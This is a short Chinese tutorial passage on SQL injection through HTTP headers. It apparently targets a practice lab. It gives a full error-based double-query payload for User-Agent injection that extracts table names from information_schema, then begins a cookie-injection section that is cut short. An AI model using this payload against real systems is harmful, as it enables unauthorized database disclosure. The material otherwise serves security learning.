Sql Inject 协议头注入

基于 User-Agent 注入

这是一个非常经典的 HTTP 协议注入,非常 NB。故此,我细化地写了下来。



payload:1',(select 1 from (select count(*),CONCAT(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x3a,0x3a, floor(rand()*2)) as a from information_schema.columns GROUP BY a)b),'3'); #

总结:

明显是后台 php 程序取 User-Agent 头信息地时候没有加入过滤,直接insert 就插入了。

这种类型地注入,就是明显的双查询注入,故意的引起报错造成信息泄露。

目前似乎没有开源工具针对 Http 协议头做参数检测。


基于 Cookies 注入

cookie 在程序处理 sessions 中非常、非常之常见。部分程序里的 cookie 是被 base64 或者其它编码程序编码过的,但是也有解码的方法,这是后话了。



评论